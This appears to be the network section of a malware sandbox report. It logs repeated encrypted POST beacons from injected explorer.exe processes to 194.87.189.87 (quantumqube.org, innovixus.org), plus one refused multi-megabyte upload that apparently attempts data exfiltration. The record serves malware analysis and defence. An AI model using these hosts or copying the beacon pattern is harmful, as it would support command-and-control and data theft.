Timestamp | Bytes transferred | Direction | Data
Oct 6, 2024 21:27:36.783082962 CEST | 279 | OUT | POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://crwqlqtuysbj.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 172
Host: innovixus.org
Oct 6, 2024 21:27:36.783169031 CEST | 172 | OUT | Data Raw: 4f c3 20 0a 9d 0d 2d 7b 16 02 58 df 92 31 5e a6 82 b9 cb a6 b1 da 8a 12 42 7e cb 66 b6 1f c3 11 15 fa 12 33 70 5b bf 17 85 58 38 83 d1 4d 76 b5 5b 28 e5 bb 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 68 7b 05 d5 0d 11 fc 0e 1a dd f6 74
Data Ascii: O -{X1^B~f3p[X8Mv[(Xc2]ainh{t9<&tM-c'"i'p)z9T#q(L`<@M\3uk3


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49746 | 194.87.189.87 | 80 | 4084 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 6, 2024 21:27:36.999839067 CEST | 281 | OUT | POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://qlijxlatgdyt.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 168
Host: quantumqube.org
Oct 6, 2024 21:27:36.999982119 CEST | 168 | OUT | Data Raw: 4f c3 20 0a 9d 0d 2d 7b 16 02 58 df 92 31 5e a6 82 b9 cb a6 b1 da 8a 12 42 7e cb 66 b6 1f c3 11 15 fa 12 33 70 5b bf 17 85 58 38 83 d1 4d 76 b5 5b 28 e5 bb 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 68 7b 05 d5 0d 11 fc 0e 07 89 9c 2c
Data Ascii: O -{X1^B~f3p[X8Mv[(Xc2]ainh{,_+BM|_\()+!~>`b:VpXrfTJpbdX=rT!
Oct 6, 2024 21:27:37.689305067 CEST | 1236 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.22.1
Date: Sun, 06 Oct 2024 19:27:37 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 66 37 30 0d 0a 40 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 27 d2 6c ac 11 c6 52 d1 3b 37 d7 a5 36 82 b4 8a ab 80 da 1b be 00 a0 92 05 00 03 0c a7 32 01 0b 00 00 07 00 9e 03 00 00 62 02 28 96 e9 7a 2a f4 cb 78 52 7f 40 00 50 00 77 c0 64 47 47 36 9c 8d 96 4a ed d1 9e d6 80 c4 6c 33 99 24 a7 b4 b4 35 c3 e1 cb 26 ef 22 79 42 75 08 78 08 f7 1d 9b dc 6b cb 0a ea f2 8b 19 bf 99 78 b9 82 ba ce 22 33 4f 4a a8 df 50 78 ae 76 77 2e c7 9b 5e 2d 28 67 32 da c8 c9 75 cd d4 a5 2b c1 10 eb 1d a0 33 0d 98 9e 44 f7 6b a9 c6 24 31 3d 1d f1 ea e8 ae 1d d5 84 1f af 15 26 fb 4f bb 25 b9 52 6e f5 a0 8a 0a 49 0e 48 3c 5c 38 d3 13 33 ca aa 9b 5c 35 3f 78 1b f1 19 e1 c2 70 4c e8 73 36 6b 7d d5 d3 6e a4 5e 14 85 a9 0e a1 79 e7 e2 8f d9 fc 87 1e 17 08 2a d3 a7 57 64 02 f2 1f 97 3a 75 05 d6 39 26 05 29 1b 93 de cb 73 67 b8 04 d4 23 37 bf be 0b 34 b2 74 c4 1a 80 c5 9c f5 2b 45 c2 a1 ce 66 f8 cd ce 41 e1 68 9b cb 45 74 60 87 17 b6 fb [TRUNCATED]
Data Ascii: f70@g@GHSN'E|6V#^.v'lR;762b(z*xR@PwdGG6Jl3$5&"yBuxkx"3OJPxvw.^-(g2u+3Dk$1=&O%RnIH<\83\5?xpLs6k}n^y*Wd:u9&)sg#74t+EfAhEt`iVzu5(b>wl?rmbJ9TJxeByyOvF"04HRH=%|\6|gg;D`}k'z7)a< `t,a+~NE:91 [t*}"?<Vs[-9\*j?l^\Gesqq=,E5T%9bH<_zjpeH`!}-uIW}Yb*Dr`-+i9z&mc7L)<zA2w@z]S~<N&]rIFvRn!zrY4OLwkk}#tYhBkqKe)!0PXA2u)}%BobsA^B5PVEyS+dLJvjlMy%[e$$$NR"b73+{l_!],NM2`~ Cri,ojn0cJAa]< Z+DEqvZ@#j [TRUNCATED]
Oct 6, 2024 21:27:37.689363956 CEST | 1236 | IN | Data Raw: 1f 68 7b ff 8c 53 3e 87 69 23 3e 4a 98 d5 35 9e 75 b0 87 46 f6 35 e4 d3 d8 5b 75 70 28 b6 cc a5 52 27 8d 2b e4 2d 87 d5 32 91 53 97 5e 47 b3 b8 82 d4 05 09 44 fc 97 d8 59 cd 1e 8e 57 92 9e 4b 41 31 11 b7 05 a1 e0 a2 79 f8 13 17 16 6f 6b 73 b7 fa
Data Ascii: h{S>i#>J5uF5[up(R'+-2S^GDYWKA1yoksLcWg!#VX\p^@IIpy5D:ND87z+'G~;}&v!eo|c.@+XX8ro^u?_jb_/x.Nyg$f
Oct 6, 2024 21:27:37.689408064 CEST | 128 | IN | Data Raw: 38 cb f3 57 00 cf df 83 0b da 27 0f 47 34 fa 7f 3a ae e7 b1 a9 fc 32 71 75 fe 46 99 e9 84 85 6f 70 a5 82 79 d3 43 e3 30 75 82 36 2b 55 bc b6 35 b6 42 ab 20 b3 5c 20 d4 79 8e 73 b3 c4 07 df 40 47 cf d1 68 df c2 d7 b7 a1 2e 23 5b 76 43 a5 cf 34 ab
Data Ascii: 8W'G4:2quFopyC0u6+U5B \ ys@Gh.#[vC4>uZE%U5%Yg7)>LA1bv#i
Oct 6, 2024 21:27:37.689439058 CEST | 1236 | IN | Data Raw: c6 24 91 86 41 51 c1 ee 45 ce 3d 7e 58 c5 f4 ca 75 92 ea f7 e4 ea 4e 32 3e 51 91 08 23 92 6b 3b ed e7 11 72 8b c2 18 27 97 78 17 a7 2c 63 c8 db 30 e9 6d fe e2 ab aa 3b d7 4d 51 55 a7 43 4c 39 e2 87 ec 10 7b 15 fe 2f 84 64 8d d6 75 83 ef 0d 7e f7
Data Ascii: $AQE=~XuN2>Q#k;r'x,c0m;MQUCL9{/du~|#.xJ%77"26q7<EY}]uf:T9Z%>`q*Xq&fFt_~CMh2vNsae"*x.V!#0
Oct 6, 2024 21:27:37.689492941 CEST | 1236 | IN | Data Raw: a7 5f 3f f1 26 c3 f6 56 5c d2 4b ad 66 60 f3 ee 30 8b 57 95 08 b6 ae c1 3b c6 86 9b c6 d3 6f 06 41 17 cf 74 a5 b9 27 9a a4 28 82 25 6e b7 da 12 47 cc 9d 8c 78 c4 2e 3f 98 79 b9 c0 e4 ec ee ea 32 f5 ca 4f 9b a6 61 c6 47 ea 37 7d da 47 b4 a4 7b 9d
Data Ascii: _?&V\Kf`0W;oAt'(%nGx.?y2OaG7}G{-Ws|P}vuoiu{|0G.U'/;;c8Fbs>t*7)Bo!"y0F.l35&lkQ*}$kX-ja,y8~#0H6?Unj'_v}&
Oct 6, 2024 21:27:37.689529896 CEST | 1236 | IN | Data Raw: 93 8e 10 13 c6 15 a4 4e 79 6f 43 cb 98 0e df 93 b7 96 5c e2 c3 35 5a 51 9b f3 7e 7f d1 b8 69 e4 53 33 61 d6 32 17 7c 1d e5 8c 61 9d 58 80 22 65 86 e1 5d f0 8c 92 24 ba b7 5c 21 d9 61 b2 00 5c 0e 41 cf e4 02 05 36 f9 93 e6 27 46 2f 44 c1 a9 09 a9
Data Ascii: NyoC\5ZQ~iS3a2|aX"e]$\!a\A6'F/Du0VlVE-}-@/5P^W"QL><#XkVc&j?8n,R}aXxTspBPoNPG^y@}f41ADPVu>9S:W
Oct 6, 2024 21:27:37.689564943 CEST | 1236 | IN | Data Raw: ba 0d 16 8f c7 77 ef a6 40 20 48 90 6b ef 0e 82 c9 3f f6 d4 cc 12 8c 61 a2 0d f8 fd 50 e7 e0 96 35 25 91 5b 8c 07 d0 b5 e9 f1 be 1e e8 95 53 cf 6c f1 78 bc 12 4a 70 2e 46 70 66 9d e1 93 60 22 7a 1e 19 4b 64 25 66 c0 d5 15 af 9b bd e1 78 07 fb 63
Data Ascii: w@ Hk?aP5%[SlxJp.Fpf`"zKd%fxcWa:(s'S.@{dqjRjM@q6$^]$;&o:{<44ob+C_4#H[qN#"kxOP^dttLje[Q%n)@7Ai
Oct 6, 2024 21:27:37.689599991 CEST | 1236 | IN | Data Raw: 4b a6 ee 6a ac cf ed ce fd 9b 55 b5 a6 5e 29 4c 6e 31 ff 3e 38 ad d4 9d 48 81 2f 43 18 f6 ff 9b 49 29 36 0b c3 87 76 82 16 71 9c dc de 23 eb ae 51 f3 43 02 5a 1a 9e 44 07 6f 78 c9 1b 9f 8b c0 6f 2a 7b 75 af fe 4f 7e 72 5e 46 da de a1 33 b6 16 f6
Data Ascii: KjU^)Ln1>8H/CI)6vq#QCZDoxo*{uO~r^F3GpO)In7mN*UNp}N]$r$Egp)#EwpI#r?tu-^4TwQ!d{9<_{N0@Q&_b_VB
Oct 6, 2024 21:27:37.689634085 CEST | 760 | IN | Data Raw: 40 a2 85 4c e5 4f 40 89 35 09 93 6e 0c 58 dc 02 ef 4f 2a dc fe 3f f9 b5 db c0 ac f5 c7 45 23 2b ac 1d b3 5a ac 5e 98 6d dc 1c 5a 46 03 8a 9c 0b d5 3c f5 7e 58 fd 55 bb 58 79 13 6e 8d 20 2a ac eb e2 57 2d fb ca e7 3f d7 d2 f7 75 90 ff 44 51 1c 49
Data Ascii: @LO@5nXO*?E#+Z^mZF<~XUXyn *W-?uDQI(U1ur 94;d=T&Aa)Rf?QmEx%'zvY_mwtct5myXrkg2Fp{:K&]*3h4N;^i@q1h$2epNnA
Oct 6, 2024 21:27:37.775978088 CEST | 1236 | IN | Data Raw: b5 49 3f 8f f5 0e 18 09 7e 39 74 66 d5 51 90 84 98 1e ee 7e e7 16 c6 83 f5 0f d8 55 1f c2 66 4b 60 f8 ef 09 6b ca af cf f9 a2 5f 27 01 b4 10 2f d9 87 dd 88 47 77 e3 3e 50 7f 6a a0 bd fe 49 9b 5e 5d 82 05 ed da 16 75 2f e2 42 ac ee ed 76 9c 16 0b
Data Ascii: I?~9tfQ~UfK`k_'/Gw>PjI^]u/BvvwHdlNGG3D!5<!-jf4?RAuD\LS*4qNwe'hN%am-?U}<^eV)LO-AM4&+E,N`uV


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49747 | 194.87.189.87 | 80 | 1868 | C:\Windows\SysWOW64\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 6, 2024 21:27:42.369002104 CEST | 280 | OUT | POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://quantumqube.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 501
Host: quantumqube.org
Oct 6, 2024 21:27:42.369024992 CEST | 501 | OUT | Data Raw: 4f c3 20 0a 9d 0d 2d 7b 16 02 58 df 92 31 5e a6 82 b9 cb a6 b1 da 8a 12 42 7e cb 66 b6 1f c3 11 15 fa 12 33 70 5b bf 17 85 58 38 cb 84 0f 33 e7 0f 05 b5 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 41 1e 61 6c 6e 68 7b 05 d5 0c 11 fc 0e 26 b0 fb 0e
Data Ascii: O -{X1^B~f3p[X83Xc2]Aalnh{&V4jp%n cE5LgO%>e?q )V(dy0GQ4E65?nEz$Sw/"@"4xWOQC9i


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.8 | 49748 | 194.87.189.87 | 80 | 5440 | C:\Windows\SysWOW64\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 6, 2024 21:28:16.087595940 CEST | 284 | OUT | POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://quantumqube.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 6348785
Host: quantumqube.org
Oct 6, 2024 21:28:16.088781118 CEST | 11124 | OUT | Data Raw: 4f c3 20 0a 9d 0d 2d 7b 16 02 58 df 92 31 5e a6 82 b9 cb a6 b1 da 8a 12 42 7e cb 66 b6 1f c3 11 15 fa 12 33 70 5b bf 17 85 58 38 cb 84 0f 33 e7 0f 05 b5 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 41 1e 61 61 6e 68 7b 05 d5 0c 11 fc 0e 3e a4 cd 0b
Data Ascii: O -{X1^B~f3p[X83Xc2]Aaanh{>U4#gSkTC'U<E);ef_<wqn1N,WP1z+_0j9%"(T@0z$#/z[6Ev$s30Bo?
Oct 6, 2024 21:28:16.092832088 CEST | 1236 | OUT | Data Raw: 66 94 d0 ac 88 e5 5f 55 8c f8 6c 15 ed 71 5b 7c e8 21 8f 2b c3 7e d5 25 0a ca c8 e4 8d cc 20 e7 34 d6 8e 78 a9 d1 06 5f 14 b8 88 56 0f f4 5b ea 65 99 c6 72 bf 71 d8 e0 8d 6a ab 10 68 20 7a 12 b3 64 af a1 6e 02 78 74 81 e3 c6 d2 cc be 10 dd 91 6f
Data Ascii: f_Ulq[|!+~% 4x_V[erqjh zdnxtol'}F:uKw8'Vq2Pdc6tYSK:kj0X~Rx8cEGV8rARM@pf>7q-7RI
Oct 6, 2024 21:28:16.093681097 CEST | 2472 | OUT | Data Raw: 1b 37 7e 6f 30 11 e6 42 c0 6f e5 cf ff 7f fc 3b 8f f8 d8 25 64 83 0c c3 45 93 8e ec 6d f6 49 7e 2b fb 29 0e f6 9f 5c 4c 06 6f 13 7b c7 06 6f c1 2b ad b2 58 04 28 91 54 ed b7 c2 68 e1 b1 c8 e8 27 fd 53 3f 45 30 ed 2c 4a cd 4f 17 73 24 99 fe 84 13
Data Ascii: 7~o0Bo;%dEmI~+)\Lo{o+X(Th'S?E0,JOs$^?nFg1z_:Bx`1IX(%40K0tZ)%I+]2rN/_9>4=,rN/t4t##LpW"]'tT:_g^xIWaH
Oct 6, 2024 21:28:16.093714952 CEST | 4944 | OUT | Data Raw: 3b 96 f3 ad ad db de 8f e2 31 51 ec 80 9f fe 10 f3 c6 ea 14 98 2f 63 52 14 79 c6 64 da 43 87 44 13 8f 02 8c 6d e9 ee c0 95 5b 8f 62 84 9f 85 de 67 e5 f4 5c 68 1a 07 18 c7 53 1a fa 4f 6b 1b b6 70 f0 5b 72 78 a4 c9 da fa 14 2e fe bd 9e 7b a3 fb a8
Data Ascii: ;1Q/cRydCDm[bg\hSOkp[rx.{B1}\qQB%C,>3DN~Y)h2haX{w!^ 1NC2 8 2.N4]H~^T7<u#P+*E$}
Oct 6, 2024 21:28:16.093743086 CEST | 2472 | OUT | Data Raw: 26 86 60 27 2c 52 81 71 45 10 dc 52 c5 82 28 4a c1 c3 79 17 4f 47 60 c6 ce 27 b7 21 66 14 7f 43 7a 82 11 3e be df e1 72 ac 54 67 04 65 6e 29 87 88 ca ad e2 50 80 5a 95 3c 3b 0d 52 4d e4 a9 62 11 86 6e 17 5a ba d0 57 42 1e 3c 98 2d b8 c2 58 cc af
Data Ascii: &`',RqER(JyOG`'!fCz>rTgen)PZ<;RMbnZWB<-X|"^6%s+/{.QUA8cS[DzPG,?AhHXLX8I:4x|QHA>t!'Y"QR[wo%2Gqp
Oct 6, 2024 21:28:16.093767881 CEST | 2472 | OUT | Data Raw: c5 2a fe 3c 5c 04 61 d3 8d a5 ba e0 8b dc b8 be ab c6 15 a8 8b ef b6 dc 2b aa 5e 4a de 58 de 29 13 2a 84 f8 df 84 2d df 0f 59 85 2e 68 f4 62 87 2d 49 a5 ec 63 64 03 d6 cb 4f 38 7a 6f 8b 39 bf e7 9c 8e 82 ec 5e f5 69 af fa 32 29 16 3b 16 69 99 96
Data Ascii: *<\a+^JX)*-Y.hb-IcdO8zo9^i2);i"EZm+P*<M+9.thwLv*4nH!wk_uD&^_Xk5n_ht9$abEJ7[Hg|<ti0DB1
Oct 6, 2024 21:28:16.093795061 CEST | 2472 | OUT | Data Raw: ca 1c 1c 6c 76 54 c9 9f df e6 30 69 5f ba d0 dd 16 99 ba 0b 5f e9 65 b9 cb 6b c7 b2 8a 46 a5 51 06 bb f8 20 c8 45 a6 59 a7 a4 7c d9 7b de ef 0a b9 70 a2 02 7a be 8d 91 8b 44 44 53 9a a5 03 32 0b 97 23 18 2f 4b 76 45 fb 1a 02 d0 8d 1e 21 0e 84 c3
Data Ascii: lvT0i__ekFQ EY|{pzDDS2#/KvE!m-6vv.2Ur,b,<8g|u,>J"G]+`Ol|DaP}G_TY1U9JG]czh?t*;"U:lPzoU
Oct 6, 2024 21:28:16.093822956 CEST | 4944 | OUT | Data Raw: 54 92 80 2e a0 c0 61 ac e7 b2 7c a6 88 3d 68 c0 31 a1 9e d1 04 99 26 ff 50 7e e2 1e 6f 50 c1 9a 7f 8c b0 c3 4b 30 76 86 8b 9f 8c 17 01 96 f6 37 08 3a dc 19 02 d7 bc e2 2b 3e f3 97 9b 82 30 98 2a 82 92 b4 68 46 ec d1 31 c8 e2 29 39 45 26 ce 60 3a
Data Ascii: T.a|=h1&P~oPK0v7:+>0*hF1)9E&`:;([0z6@v7)?yQBx@)O/+7`:tD+H50(g@CYQ4P4&mq'?""5nK>h;W?* &UPO$-zod
Oct 6, 2024 21:28:16.093907118 CEST | 2472 | OUT | Data Raw: d0 b5 c0 e0 9f c0 37 36 2f 61 93 dc 8f f4 03 dc 8e 06 72 45 c0 b8 91 b2 e1 0f ed cc 04 2e 31 70 6d 67 89 54 67 77 a9 35 44 41 82 b3 19 8a 1f 96 b2 f7 e4 2d 1d eb 09 0d ef c2 b6 9e 38 6b 28 f6 21 9d e0 24 7c c1 a5 22 23 61 99 cb 97 9c 9c 20 92 3e
Data Ascii: 76/arE.1pmgTgw5DA-8k(!$|"#a ><Pl8uZeV^%'M^2n/l)VHdR5jI<RW9MsudqSf`%K_.ontC06k<&j
Oct 6, 2024 21:28:16.097847939 CEST | 2472 | OUT | Data Raw: bb c7 a8 aa cc b1 4c 2a a5 c9 fe 6e 86 57 d8 91 08 74 2f ab 77 39 24 25 d0 fa 17 3c 73 0b 5c 29 98 45 7a ac 00 75 28 1d 08 48 77 79 cc 81 ca 53 8f 19 16 1d b9 12 6a 6c 28 38 26 69 51 da d1 ba dd b5 e1 28 fc 78 fd 39 37 ad f4 1e ca b8 04 e4 f7 7b
Data Ascii: L*nWt/w9$%<s\)Ezu(HwySjl(8&iQ(x97{=dwiH<<E6$'{,"g'*wKWMSh}A|H?]T*d_Q[IrKt$[3']?fbVP-(mp1r
Oct 6, 2024 21:28:16.719196081 CEST | 348 | IN | HTTP/1.1 413 Request Entity Too Large
Server: nginx/1.22.1
Date: Sun, 06 Oct 2024 19:28:16 GMT
Content-Type: text/html
Content-Length: 183
Connection: close
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 33 20 52 65 71 75 65 73 74 20 45 6e 74 69 74 79 20 54 6f 6f 20 4c 61 72 67 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 33 20 52 65 71 75 65 73 74 20 45 6e 74 69 74 79 20 54 6f 6f 20 4c 61 72 67 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>413 Request Entity Too Large</title></head><body><center><h1>413 Request Entity Too Large</h1></center><hr><center>nginx/1.22.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.8 | 49749 | 194.87.189.87 | 80 | 4084 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 6, 2024 21:28:55.183792114 CEST | 283 | OUT | POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://wqvfywivxptqmt.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 109
Host: quantumqube.org
Oct 6, 2024 21:28:55.183851957 CEST | 109 | OUT | Data Raw: 4f c3 20 0a 9d 0d 2d 7b 16 02 58 df 92 31 5e a6 82 b9 cb a6 b1 da 8a 12 42 7e cb 66 b6 1f c3 11 15 fa 12 33 70 5b bf 17 85 58 38 83 d1 4d 76 b5 5b 28 e5 bb 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 5d d3 8e 7d
Data Ascii: O -{X1^B~f3p[X8Mv[(Xc2]aini{]}%C}J_'5$M4
Oct 6, 2024 21:28:55.994390011 CEST | 235 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.22.1
Date: Sun, 06 Oct 2024 19:28:55 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    10192.168.2.849750194.87.189.87804084C:\Windows\explorer.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Oct 6, 2024 21:29:10.859481096 CEST281OUTPOST /index.php HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Accept: */*
                                                                                                                                    Referer: http://raievqxnfbig.com/
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Content-Length: 109
                                                                                                                                    Host: quantumqube.org
Oct 6, 2024 21:29:10.859503031 CEST | 109 | OUT | Data Raw: 4f c3 20 0a 9d 0d 2d 7b 16 02 58 df 92 31 5e a6 82 b9 cb a6 b1 da 8a 12 42 7e cb 66 b6 1f c3 11 15 fa 12 33 70 5b bf 17 85 58 38 83 d1 4d 76 b5 5b 28 e5 bb 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 5d d3 8e 7d
                                                                                                                                    Data Ascii: O -{X1^B~f3p[X8Mv[(Xc2]aini{]}%C}J_'5$M4
Oct 6, 2024 21:29:11.760560036 CEST | 235 | IN | HTTP/1.1 404 Not Found
                                                                                                                                    Server: nginx/1.22.1
                                                                                                                                    Date: Sun, 06 Oct 2024 19:29:11 GMT
                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 2f+g@GHSN'E|6V#^.v0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.8 | 49751 | 194.87.189.87 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 6, 2024 21:29:29.314513922 CEST | 284 | OUT | POST /index.php HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Accept: */*
                                                                                                                                    Referer: http://vvywjtocjkatexf.net/
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Content-Length: 109
                                                                                                                                    Host: quantumqube.org
Oct 6, 2024 21:29:29.314553022 CEST | 109 | OUT | Data Raw: 4f c3 20 0a 9d 0d 2d 7b 16 02 58 df 92 31 5e a6 82 b9 cb a6 b1 da 8a 12 42 7e cb 66 b6 1f c3 11 15 fa 12 33 70 5b bf 17 85 58 38 83 d1 4d 76 b5 5b 28 e5 bb 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 5d d3 8e 7d
                                                                                                                                    Data Ascii: O -{X1^B~f3p[X8Mv[(Xc2]aini{]}%C}J_'5$M4
Oct 6, 2024 21:29:30.176273108 CEST | 235 | IN | HTTP/1.1 404 Not Found
                                                                                                                                    Server: nginx/1.22.1
                                                                                                                                    Date: Sun, 06 Oct 2024 19:29:30 GMT
                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 2f+g@GHSN'E|6V#^.v0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.8 | 49752 | 194.87.189.87 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 6, 2024 21:29:48.248104095 CEST | 280 | OUT | POST /index.php HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Accept: */*
                                                                                                                                    Referer: http://mxfkxoyxtgh.com/
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Content-Length: 109
                                                                                                                                    Host: quantumqube.org
Oct 6, 2024 21:29:48.248116970 CEST | 109 | OUT | Data Raw: 4f c3 20 0a 9d 0d 2d 7b 16 02 58 df 92 31 5e a6 82 b9 cb a6 b1 da 8a 12 42 7e cb 66 b6 1f c3 11 15 fa 12 33 70 5b bf 17 85 58 38 83 d1 4d 76 b5 5b 28 e5 bb 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 5d d3 8e 7d
                                                                                                                                    Data Ascii: O -{X1^B~f3p[X8Mv[(Xc2]aini{]}%C}J_'5$M4
Oct 6, 2024 21:29:48.979929924 CEST | 235 | IN | HTTP/1.1 404 Not Found
                                                                                                                                    Server: nginx/1.22.1
                                                                                                                                    Date: Sun, 06 Oct 2024 19:29:48 GMT
                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 2f+g@GHSN'E|6V#^.v0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.8 | 49753 | 194.87.189.87 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 6, 2024 21:30:05.055474997 CEST | 282 | OUT | POST /index.php HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Accept: */*
                                                                                                                                    Referer: http://qxdsgfawkutaw.com/
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Content-Length: 109
                                                                                                                                    Host: quantumqube.org
Oct 6, 2024 21:30:05.055516005 CEST | 109 | OUT | Data Raw: 4f c3 20 0a 9d 0d 2d 7b 16 02 58 df 92 31 5e a6 82 b9 cb a6 b1 da 8a 12 42 7e cb 66 b6 1f c3 11 15 fa 12 33 70 5b bf 17 85 58 38 83 d1 4d 76 b5 5b 28 e5 bb 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 5d d3 8e 7d
                                                                                                                                    Data Ascii: O -{X1^B~f3p[X8Mv[(Xc2]aini{]}%C}J_'5$M4
Oct 6, 2024 21:30:05.827975988 CEST | 235 | IN | HTTP/1.1 404 Not Found
                                                                                                                                    Server: nginx/1.22.1
